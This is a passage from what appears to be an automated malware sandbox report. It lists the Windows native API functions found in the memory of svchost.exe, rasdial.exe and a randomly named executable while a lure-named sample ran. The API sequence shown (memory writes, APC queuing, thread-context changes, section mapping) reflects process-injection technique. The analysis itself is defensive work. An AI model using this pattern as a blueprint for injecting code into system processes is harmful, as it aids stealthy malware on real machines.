            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F30 NtCreateSection,1_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F60 NtCreateProcessEx,1_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E80 NtReadVirtualMemory,1_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EA0 NtAdjustPrivilegesToken,1_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EE0 NtQueueApcThread,1_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E30 NtWriteVirtualMemory,1_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DB0 NtEnumerateKey,1_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DD0 NtDelayExecution,1_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D00 NtSetInformationFile,1_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D10 NtMapViewOfSection,1_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D30 NtUnmapViewOfSection,1_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CA0 NtQueryInformationToken,1_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CC0 NtQueryVirtualMemory,1_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CF0 NtOpenProcess,1_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C00 NtQueryInformationProcess,1_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C60 NtCreateKey,1_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873090 NtSetValueKey,1_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873010 NtOpenDirectoryObject,1_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038739B0 NtGetContextThread,1_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D10 NtOpenProcessToken,1_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D70 NtOpenThread,1_2_03873D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A74650 NtSuspendThread,LdrInitializeThunk,6_2_04A74650
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A74340 NtSetContextThread,LdrInitializeThunk,6_2_04A74340
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04A72CA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72C60 NtCreateKey,LdrInitializeThunk,6_2_04A72C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04A72C70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04A72DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72DD0 NtDelayExecution,LdrInitializeThunk,6_2_04A72DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04A72D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04A72D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04A72E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04A72EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72FB0 NtResumeThread,LdrInitializeThunk,6_2_04A72FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72FE0 NtCreateFile,LdrInitializeThunk,6_2_04A72FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72F30 NtCreateSection,LdrInitializeThunk,6_2_04A72F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72AF0 NtWriteFile,LdrInitializeThunk,6_2_04A72AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72AD0 NtReadFile,LdrInitializeThunk,6_2_04A72AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04A72BA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04A72BE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04A72BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72B60 NtClose,LdrInitializeThunk,6_2_04A72B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A735C0 NtCreateMutant,LdrInitializeThunk,6_2_04A735C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A739B0 NtGetContextThread,LdrInitializeThunk,6_2_04A739B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72CF0 NtOpenProcess,6_2_04A72CF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72CC0 NtQueryVirtualMemory,6_2_04A72CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72C00 NtQueryInformationProcess,6_2_04A72C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72DB0 NtEnumerateKey,6_2_04A72DB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72D00 NtSetInformationFile,6_2_04A72D00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72EA0 NtAdjustPrivilegesToken,6_2_04A72EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72E30 NtWriteVirtualMemory,6_2_04A72E30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72FA0 NtQuerySection,6_2_04A72FA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72F90 NtProtectVirtualMemory,6_2_04A72F90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72F60 NtCreateProcessEx,6_2_04A72F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72AB0 NtWaitForSingleObject,6_2_04A72AB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A72B80 NtQueryInformationFile,6_2_04A72B80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A73090 NtSetValueKey,6_2_04A73090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A73010 NtOpenDirectoryObject,6_2_04A73010
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A73D10 NtOpenProcessToken,6_2_04A73D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A73D70 NtOpenThread,6_2_04A73D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A28FF0 NtDeleteFile,6_2_02A28FF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A28F00 NtReadFile,6_2_02A28F00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A28DA0 NtCreateFile,6_2_02A28DA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A29090 NtClose,6_2_02A29090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A291E0 NtAllocateVirtualMemory,6_2_02A291E0
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E540B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00E540B1
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E48858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E48858
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E5545F
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DFE8000_2_00DFE800
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1DBB50_2_00E1DBB5
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DFFE400_2_00DFFE40
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E7804A0_2_00E7804A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DFE0600_2_00DFE060
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E041400_2_00E04140
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E124050_2_00E12405
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E265220_2_00E26522
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E706650_2_00E70665
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E2267E0_2_00E2267E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E068430_2_00E06843
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1283A0_2_00E1283A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E289DF0_2_00E289DF
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E70AE20_2_00E70AE2
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E26A940_2_00E26A94
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E08A0E0_2_00E08A0E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E4EB070_2_00E4EB07
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E58B130_2_00E58B13
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1CD610_2_00E1CD61
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E270060_2_00E27006
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E031900_2_00E03190
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E0710E0_2_00E0710E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF12870_2_00DF1287
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E133C70_2_00E133C7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1F4190_2_00E1F419
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E116C40_2_00E116C4
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E056800_2_00E05680
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E058C00_2_00E058C0
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E178D30_2_00E178D3
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E11BB80_2_00E11BB8
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E29D050_2_00E29D05
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1BFE60_2_00E1BFE6
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E11FD00_2_00E11FD0
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00FF35E00_2_00FF35E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183631_2_00418363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010CF1_2_004010CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010D01_2_004010D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029ED1_2_004029ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029F01_2_004029F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012801_2_00401280
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC7B1_2_0040FC7B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC831_2_0040FC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165431_2_00416543
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402E901_2_00402E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FEA31_2_0040FEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E7431_2_0042E743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF231_2_0040DF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F01_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039003E61_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA3521_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C02C01_2_038C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E02741_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F41A21_2_038F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039001AA1_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F81CC1_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038301001_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA1181_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C81581_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D20001_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C01_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038647501_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038407701_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C6E01_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039005911_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038405351_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EE4F61_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E44201_2_038E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F24461_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F6BD71_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB401_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA801_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A01_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390A9A61_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038569621_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038268B81_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E8F01_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384A8401_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038428401_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BEFA01_2_038BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832FC81_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03882F281_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860F301_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E2F301_2_038E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4F401_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852E901_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FCE931_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEEDB1_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEE261_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840E591_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03858DBF1_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383ADE01_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384AD001_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DCD1F1_2_038DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0CB51_2_038E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830CF21_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840C001_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0388739A1_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F132D1_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382D34C1_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038452A01_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B2C01_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E12ED1_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385D2F01_2_0385D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384B1B01_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387516C1_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382F1721_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390B16B1_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EF0CC1_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038470C01_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F70E91_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF0E01_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF7B01_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F16CC1_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038856301_2_03885630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DD5B01_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039095C31_2_039095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F75711_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF43F1_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038314601_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FB801_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B5BF01_2_038B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387DBF91_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFB761_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DDAAC1_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03885AA01_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E1AA31_2_038E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EDAC61_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFA491_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7A461_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B3A6C1_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D59101_2_038D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038499501_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B9501_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038438E01_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AD8001_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03841F921_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFFB11_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD21_2_03803FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD51_2_03803FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFF091_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03849EB01_2_03849EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FDC01_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03843D401_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F1D5A1_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7D731_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFCF21_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B9C321_2_038B9C32
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02ABA2F65_2_02ABA2F6
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB526E5_2_02AB526E
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB52765_2_02AB5276
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02ABBB365_2_02ABBB36
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02ABD9565_2_02ABD956
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB54965_2_02AB5496
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AD3D365_2_02AD3D36
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB35165_2_02AB3516
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F92AA65_2_02F92AA6
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F948BE5_2_02F948BE
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8C1E65_2_02F8C1E6
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8C1DE5_2_02F8C1DE
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02FAACA65_2_02FAACA6
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8A4865_2_02F8A486
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8C4065_2_02F8C406
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AEE4F66_2_04AEE4F6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AE44206_2_04AE4420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF24466_2_04AF2446
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B005916_2_04B00591
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A405356_2_04A40535
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A5C6E06_2_04A5C6E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A3C7C06_2_04A3C7C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A407706_2_04A40770
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A647506_2_04A64750
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AD20006_2_04AD2000
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF41A26_2_04AF41A2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B001AA6_2_04B001AA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF81CC6_2_04AF81CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A301006_2_04A30100
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04ADA1186_2_04ADA118
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AC81586_2_04AC8158
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AC02C06_2_04AC02C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AE02746_2_04AE0274
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A4E3F06_2_04A4E3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B003E66_2_04B003E6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFA3526_2_04AFA352
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AE0CB56_2_04AE0CB5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A30CF26_2_04A30CF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A40C006_2_04A40C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A58DBF6_2_04A58DBF
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A3ADE06_2_04A3ADE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A4AD006_2_04A4AD00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04ADCD1F6_2_04ADCD1F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A52E906_2_04A52E90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFCE936_2_04AFCE93
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFEEDB6_2_04AFEEDB
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFEE266_2_04AFEE26
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A40E596_2_04A40E59
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04ABEFA06_2_04ABEFA0
